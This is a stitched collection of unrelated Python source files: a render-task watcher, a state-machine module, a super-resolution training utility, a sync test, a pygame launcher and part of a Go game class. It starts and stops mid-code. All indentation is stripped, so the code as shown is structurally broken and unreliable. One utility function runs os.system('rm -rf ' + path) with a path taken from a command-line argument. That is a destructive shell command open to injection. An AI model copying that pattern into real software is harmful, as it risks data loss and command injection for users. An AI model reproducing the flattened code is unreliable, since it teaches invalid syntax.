prev_status = self._execution_status.get(task_name, {})
task_status = prev_status.copy()
if prev_status.get('state') in task_end_states:
continue
if agent.isActive():
requested_time = time.time()
task_status = agent.taskStatus(task_name)
if not task_status:
continue
task_status['_requested_time'] = requested_time # Will help with remaining calculations
else:
# If it was not active before - just wait
if not prev_status:
continue
# If it was active - it looks like the agent failed and we have to mark the task as stopped
print('WARN: The agent became inactive - invalidating its task')
agent.taskStop(task_name) # Try to stop the task on the agent anyway
task_status['state'] = TaskState.STOPPED.name
if self._stop_task and task_status.get('state') not in task_end_states:
print('DEBUG: stopping Agent task %s' % task_name)
agent.taskStop(task_name)
# Update task messages once per 10 sec
if update_messages_time + 10 < time.time():
self.executionMessagesSet(agent.taskMessages(task_name).get(task_name), task_name)
param = 'preview'
if prev_status.get('result', {}).get(param) != task_status.get('result', {}).get(param):
print('DEBUG: task %s %s changed: %s' % (task_name, param, task_status.get('result', {}).get(param)))
agent.requestPreviewDownload(task_name, self.updatePreview)
param = 'render'
if prev_status.get('result', {}).get(param) != task_status.get('result', {}).get(param):
print('DEBUG: task %s %s changed: %s' % (task_name, param, task_status.get('result', {}).get(param)))
agent.requestRenderDownload(task_name, self.updateRender)
param = 'state'
if prev_status.get(param) != task_status.get(param):
print('DEBUG: task %s %s changed: %s' % (task_name, param, task_status.get(param)))
if task_status.get('state') == TaskState.RUNNING.name:
with self._status_lock:
# Set the actual start time when the first agent task reported about it
if not self._status['start_time_actual']:
self._status['start_time_actual'] = task_status.get('start_time')
if task_status.get('state') in task_end_states:
print('DEBUG: Retrieve details about the task %s execution' % task_name)
self.executionDetailsSet(agent.taskDetails(task_name).get(task_name), task_name)
self.executionMessagesSet(agent.taskMessages(task_name).get(task_name), task_name)
agent.workEnded()
if task_status.get('state') == TaskState.STOPPED.name:
print('WARN: The agent task %s was stopped' % task_name)
return_samples = task_status.get('samples', agent.work().get('samples'))
# The main task output is the render - so if it exists, we can assume that some work was done
if task_status.get('result', {}).get('render'):
# If agent was able to complete some work - return the rest back to task
if task_status.get('samples_done'):
return_samples -= task_status['samples_done']
else:
# Due to the issue BlendNet#57 it's the only way for the stopped agent task
# Making sure user will not see more samples than actually rendered
task_status['samples_done'] = 0
# Cleaning results of failed task
self.updatePreview(task_name, None)
self.updateRender(task_name, None)
if return_samples > 0:
print('DEBUG: Agent %s returning samples to render: %s' % (agent._name, return_samples))
self.returnAcquiredWorkload(return_samples)
if task_status.get('state') == TaskState.COMPLETED.name:
print('INFO: The agent task %s was completed' % task_name)
if task_status.get('state') == TaskState.ERROR.name:
print('ERROR: The agent task %s was ended with status "ERROR"' % task_name)
self._execution_status[task_name] = task_status
if update_messages_time + 10 < time.time():
update_messages_time = time.time()
# Updating the task left samples
self.statusSamplesDoneSet(sum([ t.get('samples_done') for t in self._execution_status.values() ]))
# Calculate the task remaining time
time_per_sample = []
for task, status in self._execution_status.items():
if not (status.get('start_time') and status.get('samples')):
continue
if status.get('end_time'):
# Simple calculation based on start and end time
time_per_sample.append((status['end_time'] - status['start_time']) / status['samples'])
elif status.get('remaining') and status.get('samples_done'):
# Calculating time per sample based on task remaining time and left samples to render
prelim_render_time = status['_requested_time'] + status['remaining'] - status['start_time']
time_per_sample.append(prelim_render_time / status['samples'])
if time_per_sample:
remaining = statistics.median(time_per_sample) * (self._cfg.samples - self._status['samples_done'])
self.statusRemainingSet(int(remaining))
# Check if all the samples were processed and the tasks completed
if self._status['results_processing']:
# If the results are processing - let's do nothing
pass
elif any([ task.get('state') == TaskState.ERROR.name for task in self._execution_status.values() ]):
for name, task in self._execution_status.items():
if not task.get('state_error_info'):
continue
print('ERROR: Agent task "%s" ended up in ERROR state' % name)
self.stateError({name: task.get('state_error_info')})
elif all([ task.get('state') in task_end_states for task in self._execution_status.values() ]):
if self._stop_task:
print('INFO: Task %s is stopped' % self.name())
self.stateStop()
self._stop_task = False
continue
if self._status['result']['compose']:
print('INFO: Task %s is completed' % (self.name(),))
self.stateComplete()
continue
time.sleep(1.0)
with self._state_lock:
print('DEBUG: Execution watcher of task "%s" is ended with state %s' % (self.name(), self._state.name))
with self._execution_lock:
self._execution_watcher = None
def status(self):
'''Returns the manager task status information'''
out = super().status()
out.update({
'compose_filepath': self._cfg.compose_filepath,
})
return out
def statusComposeSet(self, blob_id):
with self._status_lock:
self._status['result']['compose'] = blob_id
def _stop(self):
self._stop_task = True
def stateSet(self, state):
super().stateSet(state)
self._parent.tasksSave([self])
|
__init__.py
|
from collections import defaultdict
import inspect
import time
import threading
class TransitionWithoutOverloadException(Exception):
pass
nop = lambda *a, **kw: None
class Transition:
def __init__(self, next=None, check=None, watch=[]):
if next is not None:
self.next = next
self.watch = watch
if check is not None:
self.check = check
def getNextState(self, *args):
return self.next
def watchParameters(self):
return self.watch
def check(self, *args):
return True
def onTrigger(self, *args, **kwargs):
pass
class Timeout(Transition):
def __init__(self, next, seconds):
Transition.__init__(self, next=next, watch=["time_in_state"])
self.seconds = seconds
def check(self, time_in_state):
return time_in_state > self.seconds
def addTransition(state=None, next=None, watch=None):
def decorator(fn):
w = watch
if w is None:
if fn.check != Transition.check:
w = inspect.getfullargspec(fn.check).args[1:]
elif fn.getNextState != Transition.getNextState:
w = inspect.getfullargspec(fn.getNextState).args[1:]
elif fn.onTrigger != Transition.onTrigger:
w = inspect.getfullargspec(fn.onTrigger).args[1:]
elif fn.watchParameters == Transition.watchParameters:
raise TransitionWithoutOverloadException("""Transition has not overloaded any of the following methods:
check, getNextState, onTrigger, watchParameters""")
if fn.watchParameters == Transition.watchParameters:
t = fn(next=next, watch=w)
else:
t = fn(next=next)
if state is not None:
state.addTransition(t)
return fn
return decorator
class State:
def __init__(self, name="", parent=None, onEnter=nop, onExit=nop):
self.name = name
self.parent = parent
self.transitions = []
self.watch = defaultdict(list)
self._onEnter = onEnter
self._onExit = onExit
def addTransition(self, t):
self.transitions.append(t)
wparams = t.watchParameters()
if len(wparams)>0:
for w in wparams:
self.watch[w].append(t)
else:
self.watch["__any__"].append(t)
def onEnter(self):
self._onEnter()
def onExit(self):
self._onExit()
def __str__(self):
return self.name
def __repr__(self):
return self.name
class StateMachine:
def __init__(self, root, time_resolution=0.1):
self.current_state = list()
self.current_state_set = set()
self.values = dict()
self.known_params = set()
self.just_transitioned = True
self.watch_params = defaultdict(list)
self.transitions = []
self.changeState(root)
self._stop_event = threading.Event()
def selfheartbeat(sm):
while not self._stop_event.is_set():
sm.heartbeat()
time.sleep(time_resolution)
self.heartbeat_thread = threading.Thread(target=selfheartbeat, args=(self,))
self.heartbeat_thread.daemon = True
self.heartbeat_thread.start()
def __del__(self):
self._stop_event.set()
def changeState(self, s):
newState = list()
newStateSet = set()
while s is not None:
if s not in newStateSet:
newState.append(s)
newStateSet.add(s)
s = s.parent
if self.current_state != set():
if self.current_state != newState:
for s in (self.current_state_set - newStateSet):
s.onExit()
for s in (newStateSet - self.current_state_set):
s.onEnter()
self.current_state = newState
self.current_state_set = newStateSet
self.state_time_entered = time.time()
self.heartbeat(quiet=True)
self.onChangeState(newState)
self.watch_params = defaultdict(list)
self.transitions = []
for s in self.current_state:
for (param, transitions) in s.watch.items():
self.watch_params[param].extend(transitions)
self.transitions.extend(transitions)
def heartbeat(self, quiet=False):
if quiet:
self.values["time_in_state"] = time.time() - self.state_time_entered
else:
self.update("time_in_state", time.time() - self.state_time_entered)
def update(self, param, value):
if isinstance(value, (bool,)):
if param in self.values and value == self.values[param]:
return
self.values[param] = value
self.known_params.add(param)
if self.just_transitioned:
transitions = self.transitions
else:
transitions = self.watch_params[param] + self.watch_params["__any__"]
for t in transitions:
params = t.watchParameters()
if self.known_params.issuperset(params):
needed_params = [self.values[p] for p in params]
if t.check(*needed_params):
nextState = t.getNextState(*needed_params)
if nextState is not None:
t.onTrigger(*needed_params)
self.changeState(nextState)
self.just_transitioned = True
return
self.just_transitioned = False
def onChangeState(self, s):
pass
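if __name__ == '__main__':
    # Minimal usage sketch (an illustrative assumption, not part of the original
    # module API): a tiny two-state machine where "idle" watches a boolean
    # "ready" parameter via a decorated Transition subclass and would otherwise
    # fall back to "done" after a Timeout.
    idle = State(name='idle', onEnter=lambda: print('entered idle'))
    done = State(name='done', onEnter=lambda: print('entered done'))

    @addTransition(state=idle, next=done)
    class ReadyTransition(Transition):
        def check(self, ready):  # watched parameters are inferred as ['ready']
            return ready

    idle.addTransition(Timeout(next=done, seconds=5))
    sm = StateMachine(idle)
    sm.update('ready', True)  # triggers ReadyTransition and enters "done"
    print('current state:', sm.current_state[0])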
|
utility.py
|
import os
import math
import time
import datetime
from multiprocessing import Process
from multiprocessing import Queue
import argparse
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import imageio
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
class timer():
def __init__(self):
self.acc = 0
self.tic()
def tic(self):
self.t0 = time.time()
def toc(self, restart=False):
diff = time.time() - self.t0
if restart: self.t0 = time.time()
return diff
def hold(self):
self.acc += self.toc()
def release(self):
ret = self.acc
self.acc = 0
return ret
def reset(self):
self.acc = 0
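# A small usage sketch for the timer above (illustrative only; run_epoch and
# run_eval are hypothetical workloads): accumulate time across several measured
# sections and read the total back once.
#
#   t = timer()
#   t.tic(); run_epoch(); t.hold()   # add the elapsed time to the accumulator
#   t.tic(); run_eval(); t.hold()
#   total = t.release()              # return the accumulated seconds and reset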
class checkpoint():
def __init__(self, args):
self.args = args
self.ok = True
self.log = torch.Tensor()
now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
if not args.load:
if not args.save:
args.save = now
self.dir = os.path.join('..', 'experiment', args.save)
else:
self.dir = os.path.join('..', 'experiment', args.load)
if os.path.exists(self.dir):
self.log = torch.load(self.get_path('psnr_log.pt'))
print('Continue from epoch {}...'.format(len(self.log)))
else:
args.load = ''
if args.reset:
os.system('rm -rf ' + self.dir)
args.load = ''
os.makedirs(self.dir, exist_ok=True)
os.makedirs(self.get_path('model'), exist_ok=True)
for d in args.data_test:
os.makedirs(self.get_path('results-{}'.format(d)), exist_ok=True)
open_type = 'a' if os.path.exists(self.get_path('log.txt')) else 'w'
self.log_file = open(self.get_path('log.txt'), open_type)
with open(self.get_path('config.txt'), open_type) as f:
f.write(now + '\n\n')
for arg in vars(args):
f.write('{}: {}\n'.format(arg, getattr(args, arg)))
f.write('\n')
self.n_processes = 8
def get_path(self, *subdir):
return os.path.join(self.dir, *subdir)
def save(self, trainer, epoch, is_best=False):
trainer.model.save(self.get_path('model'), epoch, is_best=is_best)
trainer.loss.save(self.dir)
trainer.loss.plot_loss(self.dir, epoch)
self.plot_psnr(epoch)
trainer.optimizer.save(self.dir)
torch.save(self.log, self.get_path('psnr_log.pt'))
def add_log(self, log):
self.log = torch.cat([self.log, log])
def write_log(self, log, refresh=False):
print(log)
self.log_file.write(log + '\n')
if refresh:
self.log_file.close()
self.log_file = open(self.get_path('log.txt'), 'a')
def done(self):
self.log_file.close()
def plot_psnr(self, epoch):
axis = np.linspace(1, epoch, epoch)
for idx_data, d in enumerate(self.args.data_test):
label = 'SR on {}'.format(d)
fig = plt.figure()
plt.title(label)
for idx_scale, scale in enumerate(self.args.scale):
plt.plot(
axis,
self.log[:, idx_data, idx_scale].numpy(),
label='Scale {}'.format(scale)
)
plt.legend()
plt.xlabel('Epochs')
plt.ylabel('PSNR')
plt.grid(True)
plt.savefig(self.get_path('test_{}.pdf'.format(d)))
plt.close(fig)
def begin_background(self):
self.queue = Queue()
def bg_target(queue):
while True:
if not queue.empty():
filename, tensor = queue.get()
if filename is None: break
imageio.imwrite(filename, tensor.numpy())
self.process = [
Process(target=bg_target, args=(self.queue,)) \
for _ in range(self.n_processes)
]
for p in self.process: p.start()
def end_background(self):
for _ in range(self.n_processes): self.queue.put((None, None))
while not self.queue.empty(): time.sleep(1)
for p in self.process: p.join()
def save_results(self, dataset, filename, save_list, scale):
if self.args.save_results:
filename = self.get_path(
'results-{}'.format(dataset.dataset.name),
'{}_x{}_'.format(filename, scale)
)
postfix = ('SR', 'LR', 'HR')
for v, p in zip(save_list, postfix):
normalized = v[0].mul(255 / self.args.rgb_range)
tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
self.queue.put(('{}{}.png'.format(filename, p), tensor_cpu))
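# A rough usage sketch of the background saver above (names such as `loader`,
# `sr`, `lr`, `hr` are hypothetical, and args.save_results is assumed enabled):
# spawn the writer processes, queue the images to save, then drain the queue
# and join the workers.
#
#   ckp = checkpoint(args)
#   ckp.begin_background()
#   ckp.save_results(loader, 'img001', [sr, lr, hr], scale=2)
#   ckp.end_background()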
def quantize(img, rgb_range):
pixel_range = 255 / rgb_range
return img.mul(pixel_range).clamp(0, 255).round().div(pixel_range)
def calc_psnr(sr, hr, scale, rgb_range, dataset=None):
if hr.nelement() == 1: return 0
diff = (sr - hr) / rgb_range
if dataset and dataset.dataset.benchmark:
shave = scale
if diff.size(1) > 1:
gray_coeffs = [65.738, 129.057, 25.064]
convert = diff.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
diff = diff.mul(convert).sum(dim=1)
else:
shave = scale + 6
valid = diff[..., shave:-shave, shave:-shave]
mse = valid.pow(2).mean()
return -10 * math.log10(mse)
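# Note on the formula above: because `diff` is divided by rgb_range, the
# returned -10 * log10(mse) equals the usual PSNR definition
# 10 * log10(MAX^2 / MSE) with MAX = rgb_range, computed over the shaved crop.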
def make_optimizer(args, target):
'''
make optimizer and scheduler together
'''
# optimizer
trainable = filter(lambda x: x.requires_grad, target.parameters())
kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
if args.optimizer == 'SGD':
optimizer_class = optim.SGD
kwargs_optimizer['momentum'] = args.momentum
elif args.optimizer == 'ADAM':
optimizer_class = optim.Adam
kwargs_optimizer['betas'] = args.betas
kwargs_optimizer['eps'] = args.epsilon
elif args.optimizer == 'RMSprop':
optimizer_class = optim.RMSprop
kwargs_optimizer['eps'] = args.epsilon
# scheduler
milestones = list(map(lambda x: int(x), args.decay.split('-')))
kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
scheduler_class = lrs.MultiStepLR
class CustomOptimizer(optimizer_class):
def __init__(self, *args, **kwargs):
super(CustomOptimizer, self).__init__(*args, **kwargs)
def _register_scheduler(self, scheduler_class, **kwargs):
self.scheduler = scheduler_class(self, **kwargs)
def save(self, save_dir):
torch.save(self.state_dict(), self.get_dir(save_dir))
def load(self, load_dir, epoch=1):
self.load_state_dict(torch.load(self.get_dir(load_dir)))
if epoch > 1:
for _ in range(epoch): self.scheduler.step()
def get_dir(self, dir_path):
return os.path.join(dir_path, 'optimizer.pt')
def schedule(self):
self.scheduler.step()
def get_lr(self):
return self.scheduler.get_lr()[0]
def get_last_epoch(self):
return self.scheduler.last_epoch
optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
return optimizer
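# A minimal usage sketch for make_optimizer (the field values below are
# hypothetical; the real `args` comes from the project's option parser):
#
#   import types, torch.nn as nn
#   demo_args = types.SimpleNamespace(
#       lr=1e-4, weight_decay=0, optimizer='ADAM', betas=(0.9, 0.999),
#       epsilon=1e-8, decay='200-400', gamma=0.5)
#   opt = make_optimizer(demo_args, nn.Linear(4, 4))
#   opt.schedule()       # advance the learning-rate scheduler by one epoch
#   print(opt.get_lr())  # current learning rate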
def str2bool(val):
"""enable default constant true arguments"""
# https://stackoverflow.com/questions/15008758/parsing-boolean-values-with-argparse
if isinstance(val, bool):
return val
elif val.lower() == 'true':
return True
elif val.lower() == 'false':
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected')
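# A typical registration sketch for the helper above (the flag name is
# hypothetical), following the linked Stack Overflow pattern:
#
#   parser = argparse.ArgumentParser()
#   parser.add_argument('--use_ema', type=str2bool, nargs='?',
#                       const=True, default=False)
#   # `--use_ema` alone parses to True; `--use_ema false` parses to False.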
from model import common
def compute_costs(model, args):
print('-----------Compute Costs and Num. Params.-----------')
#original_MACs, original_params = get_model_complexity_info(model.model.G.module, (3,720,1280), as_strings=False)
original_MACs = 91.22 * 1e9
original_params = 1.11 * 1e6
# To obtain input spatial sizes in each layer
dummy = torch.ones([1,3,720//args.scale[0],1280//args.scale[0]]).cuda()
model(dummy, 0)
GMACs_after_pruning, original_MACs_for_conv = model.model.compute_costs()
pruned_params = 0
for m in model.model.modules():
if isinstance(m, common.SparseConv):
num_weight = m.weight.numel()
scores = torch.clamp(m.priority_scores, 0, 1.03)
prob = torch.cumprod(scores, dim=0)
binary = (prob>0.5).int().cuda()
N = 1 + binary.sum()
pruned_params += num_weight * (1-N/m.M)
params_after_pruning = original_params - pruned_params
print('--Before Pruning--')
print(f'GMACs: {round(original_MACs/1e9,2)}, Num. of Params.: {round(original_params/1e6,2)} M')
print('--After Pruning--')
print(f'GMACs: {round((original_MACs - original_MACs_for_conv + GMACs_after_pruning.item())/1e9,2)}, Num. of Params.: {round(params_after_pruning.item()/1e6,2)} M')
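# A worked example of the pruning arithmetic above (hypothetical numbers; the
# exact meaning of m.M depends on the SparseConv implementation): if m.M = 8
# and the cumulative keep-probabilities leave 3 entries above 0.5, then
# N = 1 + 3 = 4 and num_weight * (1 - 4/8), i.e. half of that layer's weights,
# is added to pruned_params.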
|
test_main.py
|
import os
import threading
import time
import unittest
from OpenDrive.client_side import file_changes_json as c_json
from OpenDrive.client_side import interface
from OpenDrive.client_side import main
from OpenDrive.client_side import paths as client_paths
from OpenDrive.server_side import paths as server_paths
from tests.client_side.helper_client import h_register_dummy_user_device_client
from tests.helper_all import h_client_routine, h_start_server_process, h_stop_server_process, \
h_clear_init_all_folders, h_create_empty
class TestMain(unittest.TestCase):
def setUp(self) -> None:
h_clear_init_all_folders()
self._server_process = h_start_server_process()
self.folder1_abs_local_path = client_paths.normalize_path(client_paths.LOCAL_CLIENT_DATA, "folder1")
h_create_empty(self.folder1_abs_local_path)
main.MIN_UPDATE_PAUSE_TIME = 1
def tearDown(self) -> None:
main.shutdown()
h_stop_server_process(self._server_process)
@h_client_routine(clear_folders=False)
def putest_start_logged_in(self):
user = h_register_dummy_user_device_client()
main_thread = threading.Thread(target=main.start, daemon=True)
main_thread.start()
time.sleep(2) # wait till changes.json is created
interface.add_sync_folder(self.folder1_abs_local_path, "folder1")
expected_content = c_json.get_all_data()
file_path = os.path.join(self.folder1_abs_local_path, "dummy.txt")
with open(file_path, "w") as f:
f.write("Hello World")
time.sleep(5) # wait till synchronization finished
expected_path = os.path.join(server_paths.get_users_root_folder(user.user_id), "folder1/dummy.txt")
self.assertTrue(os.path.exists(expected_path), "dummy file is not pulled to server!")
self.assertEqual(expected_content, c_json.get_all_data())
time.sleep(1) # wait till waiting...
|
dework.py
|
from configparser import ConfigParser
from multiprocessing import Process, Queue
import pygame
from core.data_retriever import DataRetriever
from core.data_presenter import DataPresenter
from core.logging_filters import create_logger
from scripts.create_db import create_db_if_not_present
CONFIG_FILE = 'config.ini'
pygame.init()
if __name__ == '__main__':
config = ConfigParser()
config.read(CONFIG_FILE)
logger = create_logger(config['general']['logging_path'], __name__)
logger.info("Starting main application")
create_db_if_not_present(CONFIG_FILE)
queue_retriever = Queue()
queue_presenter = Queue()
data_retriever = DataRetriever(CONFIG_FILE, queue_retriever)
data_presenter = DataPresenter(CONFIG_FILE, queue_presenter)
p_retrieve = Process(target=data_retriever.run)
p_present = Process(target=data_presenter.run)
p_retrieve.start()
p_present.start()
obj = queue_presenter.get()
logger.info("Received halting signal from presenter")
logger.info("halting retriever")
queue_retriever.put("halt")
logger.info("Closing queues")
queue_retriever.close()
queue_presenter.close()
queue_retriever.join_thread()
queue_presenter.join_thread()
logger.info("Joining processes")
p_present.join()
p_retrieve.join()
logger.info("Quitting pygame")
pygame.quit()
|
game.py
|
import math
import os
import re
import threading
from datetime import datetime
from typing import Dict, List, Optional, Union
from kivy.clock import Clock
from katrain.core.constants import (
HOMEPAGE,
OUTPUT_DEBUG,
OUTPUT_INFO,
STATUS_ANALYSIS,
STATUS_INFO,
STATUS_TEACHING,
PLAYER_AI,
)
from katrain.core.engine import KataGoEngine
from katrain.core.game_node import GameNode
from katrain.core.lang import i18n, rank_label
from katrain.core.sgf_parser import SGF, Move
from katrain.core.utils import var_to_grid
class IllegalMoveException(Exception):
pass
class KaTrainSGF(SGF):
_NODE_CLASS = GameNode
class Game:
"""Represents a game of go, including an implementation of capture rules."""
DEFAULT_PROPERTIES = {"GM": 1, "FF": 4, "AP": f"KaTrain:{HOMEPAGE}", "CA": "UTF-8"}
def __init__(
self,
katrain,
engine: Union[Dict, KataGoEngine],
move_tree: GameNode = None,
analyze_fast=False,
game_properties: Optional[Dict] = None,
):
self.katrain = katrain
self._lock = threading.Lock()
if not isinstance(engine, Dict):
engine = {"B": engine, "W": engine}
self.engines = engine
self.game_id = datetime.strftime(datetime.now(), "%Y-%m-%d %H %M %S")
if move_tree:
self.root = move_tree
self.komi = self.root.komi
handicap = int(self.root.get_property("HA", 0))
if handicap and not self.root.placements:
self.root.place_handicap_stones(handicap)
else:
board_size = katrain.config("game/size")
self.komi = katrain.config("game/komi")
self.root = GameNode(
properties={
**Game.DEFAULT_PROPERTIES,
**{"SZ": board_size, "KM": self.komi, "DT": self.game_id},
**(game_properties or {}),
}
)
handicap = katrain.config("game/handicap")
if handicap:
self.root.place_handicap_stones(handicap)
if not self.root.get_property("RU"):
self.root.set_property("RU", katrain.config("game/rules"))
self.set_current_node(self.root)
threading.Thread(
target=lambda: self.analyze_all_nodes(-1_000_000, analyze_fast=analyze_fast), daemon=True
).start() # return faster, but bypass Kivy Clock
def analyze_all_nodes(self, priority=0, analyze_fast=False):
for node in self.root.nodes_in_tree:
node.analyze(self.engines[node.next_player], priority=priority, analyze_fast=analyze_fast)
# -- move tree functions --
def _calculate_groups(self):
board_size_x, board_size_y = self.board_size
with self._lock:
self.board = [
[-1 for _x in range(board_size_x)] for _y in range(board_size_y)
] # type: List[List[int]] # board pos -> chain id
self.chains = [] # type: List[List[Move]] # chain id -> chain
self.prisoners = [] # type: List[Move]
self.last_capture = [] # type: List[Move]
try:
for node in self.current_node.nodes_from_root:
for m in node.move_with_placements:
self._validate_move_and_update_chains(
m, True
) # ignore ko since we didn't know if it was forced
except IllegalMoveException as e:
raise Exception(f"Unexpected illegal move ({str(e)})")
def _validate_move_and_update_chains(self, move: Move, ignore_ko: bool):
board_size_x, board_size_y = self.board_size
def neighbours(moves):
return {
self.board[m.coords[1] + dy][m.coords[0] + dx]
for m in moves
for dy, dx in [(-1, 0), (1, 0), (0, -1), (0, 1)]
if 0 <= m.coords[0] + dx < board_size_x and 0 <= m.coords[1] + dy < board_size_y
}
ko_or_snapback = len(self.last_capture) == 1 and self.last_capture[0] == move
self.last_capture = []
if move.is_pass:
return
if self.board[move.coords[1]][move.coords[0]] != -1:
raise IllegalMoveException("Space occupied")
nb_chains = list({c for c in neighbours([move]) if c >= 0 and self.chains[c][0].player == move.player})
if nb_chains:
this_chain = nb_chains[0]
self.board = [
[nb_chains[0] if sq in nb_chains else sq for sq in line] for line in self.board
] # merge chains connected by this move
for oc in nb_chains[1:]:
self.chains[nb_chains[0]] += self.chains[oc]
self.chains[oc] = []
self.chains[nb_chains[0]].append(move)
else:
this_chain = len(self.chains)
self.chains.append([move])
self.board[move.coords[1]][move.coords[0]] = this_chain
opp_nb_chains = {c for c in neighbours([move]) if c >= 0 and self.chains[c][0].player != move.player}
for c in opp_nb_chains:
if -1 not in neighbours(self.chains[c]):
self.last_capture += self.chains[c]
for om in self.chains[c]:
self.board[om.coords[1]][om.coords[0]] = -1
self.chains[c] = []
if ko_or_snapback and len(self.last_capture) == 1 and not ignore_ko:
raise IllegalMoveException("Ko")
self.prisoners += self.last_capture
if -1 not in neighbours(self.chains[this_chain]): # TODO: NZ rules?
raise IllegalMoveException("Suicide")
# Play a Move from the current position, raise IllegalMoveException if invalid.
def play(self, move: Move, ignore_ko: bool = False, analyze=True):
board_size_x, board_size_y = self.board_size
if not move.is_pass and not (0 <= move.coords[0] < board_size_x and 0 <= move.coords[1] < board_size_y):
raise IllegalMoveException(f"Move {move} outside of board coordinates")
try:
self._validate_move_and_update_chains(move, ignore_ko)
except IllegalMoveException:
self._calculate_groups()
raise
with self._lock:
played_node = self.current_node.play(move)
self.current_node = played_node
if analyze:
played_node.analyze(self.engines[played_node.next_player])
return played_node
def set_current_node(self, node):
self.current_node = node
self._calculate_groups()
def undo(self, n_times=1):
cn = self.current_node # avoid race conditions
for _ in range(n_times):
if not cn.is_root:
cn = cn.parent
self.set_current_node(cn)
def redo(self, n_times=1):
cn = self.current_node # avoid race conditions
for _ in range(n_times):
if cn.children:
cn = cn.ordered_children[0]
self.set_current_node(cn)
def cycle_children(self, direction):
cn = self.current_node # avoid race conditions
if cn.parent and len(cn.parent.children) > 1:
ordered_children = cn.parent.ordered_children
ix = (ordered_children.index(cn) + len(ordered_children) + direction) % len(ordered_children)
self.set_current_node(ordered_children[ix])
@property
def board_size(self):
return self.root.board_size
@property
def stones(self):
with self._lock:
return sum(self.chains, [])
@property
def ended(self):
return self.current_node.parent and self.current_node.is_pass and self.current_node.parent.is_pass
@property
def prisoner_count(
self,
) -> Dict: # returns prisoners that are of a certain colour as {B: black stones captured, W: white stones captured}
return {player: sum([m.player == player for m in self.prisoners]) for player in Move.PLAYERS}
@property
def manual_score(self):
rules = self.engines["B"].get_rules(self.root)
if not self.current_node.ownership or rules != "japanese":
if not self.current_node.score:
return None
self.katrain.log(
f"rules '{rules}' are not japanese, or no ownership available ({not self.current_node.ownership}) -> no manual score available",
OUTPUT_DEBUG,
)
return self.current_node.format_score(round(2 * self.current_node.score) / 2) + "?"
board_size_x, board_size_y = self.board_size
ownership_grid = var_to_grid(self.current_node.ownership, (board_size_x, board_size_y))
stones = {m.coords: m.player for m in self.stones}
lo_threshold = 0.15
hi_threshold = 0.85
max_unknown = 10
max_dame = 4 * (board_size_x + board_size_y)
def japanese_score_square(square, owner):
player = stones.get(square, None)
if (
(player == "B" and owner > hi_threshold)
or (player == "W" and owner < -hi_threshold)
or abs(owner) < lo_threshold
):
return 0 # dame or own stones
if player is None and abs(owner) >= hi_threshold:
return round(owner) # surrounded empty intersection
if (player == "B" and owner < -hi_threshold) or (player == "W" and owner > hi_threshold):
return 2 * round(owner) # captured stone
return math.nan # unknown!
scored_squares = [
japanese_score_square((x, y), ownership_grid[y][x])
for y in range(board_size_y)
for x in range(board_size_x)
]
num_sq = {t: sum([s == t for s in scored_squares]) for t in [-2, -1, 0, 1, 2]}
num_unkn = sum(math.isnan(s) for s in scored_squares)
prisoners = self.prisoner_count
score = sum([t * n for t, n in num_sq.items()]) + prisoners["W"] - prisoners["B"] - self.komi
self.katrain.log(
f"Manual Scoring: {num_sq} score by square with {num_unkn} unknown, {prisoners} captures, and {self.komi} komi -> score = {score}",
OUTPUT_DEBUG,
)
if num_unkn > max_unknown or (num_sq[0] - len(stones)) > max_dame:
return None
return self.current_node.format_score(score)
def __repr__(self):
return (
"\n".join("".join(self.chains[c][0].player if c >= 0 else "-" for c in line) for line in self.board)
+ f"\ncaptures: {self.prisoner_count}"
)
def write_sgf(
self, path: str, trainer_config: Optional[Dict] = None,
):
if trainer_config is None:
trainer_config = self.katrain.config("trainer")
save_feedback = trainer_config["save_feedback"]
eval_thresholds = trainer_config["eval_thresholds"]
def player_name(player_info):
return f"{i18n._(player_info.player_type)} ({i18n._(player_info.player_subtype)})"
if "KaTrain" in self.root.get_property("AP", ""):
for bw in "BW":
self.root.set_property("P" + bw, player_name(self.katrain.players_info[bw]))
player_info = self.katrain.players_info[bw]
if player_info.player_type == PLAYER_AI:
self.root.set_property(bw + "R", rank_label(player_info.calculated_rank))
player_names = {bw: re.sub(r"['<>:\"/\\|?*]", "", self.root.get_property("P" + bw, bw)) for bw in "BW"}
game_name = f"katrain_{player_names['B']} vs {player_names['W']} {self.game_id}"
file_name = os.path.abspath(os.path.join(path, f"{game_name}.sgf"))
os.makedirs(os.path.dirname(file_name), exist_ok=True)
show_dots_for = {
bw: trainer_config.get("eval_show_ai", True) or self.katrain.players_info[bw].human for bw in "BW"
}
sgf = self.root.sgf(
save_comments_player=show_dots_for, save_comments_class=save_feedback, eval_thresholds=eval_thresholds
)
with open(file_name, "w", encoding="utf-8") as f:
f.write(sgf)
return i18n._("sgf written").format(file_name=file_name)
def analyze_extra(self, mode, **kwargs):
stones = {s.coords for s in self.stones}
cn = self.current_node
engine = self.engines[cn.next_player]
Clock.schedule_once(self.katrain.analysis_controls.hints.activate, 0)
if mode == "extra":
if kwargs.get("continuous", False):
visits = max(engine.config["max_visits"], math.ceil(cn.analysis_visits_requested * 1.25))
else:
visits = cn.analysis_visits_requested + engine.config["max_visits"]
self.katrain.controls.set_status(i18n._("extra analysis").format(visits=visits), STATUS_ANALYSIS)
cn.analyze(engine, visits=visits, priority=-1_000, time_limit=False)
return
if mode == "game":
nodes = self.root.nodes_in_tree
if "visits" in kwargs:
visits = kwargs["visits"]
else:
min_visits = min(node.analysis_visits_requested for node in nodes)
visits = min_visits + engine.config["max_visits"]
for node in nodes:
node.analyze(engine, visits=visits, priority=-1_000_000, time_limit=False)
self.katrain.controls.set_status(i18n._("game re-analysis").format(visits=visits), STATUS_ANALYSIS)
return
elif mode == "sweep":
board_size_x, board_size_y = self.board_size
if cn.analysis_ready:
policy_grid = (
var_to_grid(self.current_node.policy, size=(board_size_x, board_size_y))
if self.current_node.policy
else None
)
analyze_moves = sorted(
[
Move(coords=(x, y), player=cn.next_player)
for x in range(board_size_x)
for y in range(board_size_y)
if (policy_grid is None and (x, y) not in stones) or policy_grid[y][x] >= 0
],
key=lambda mv: -policy_grid[mv.coords[1]][mv.coords[0]],
)
else:
analyze_moves = [
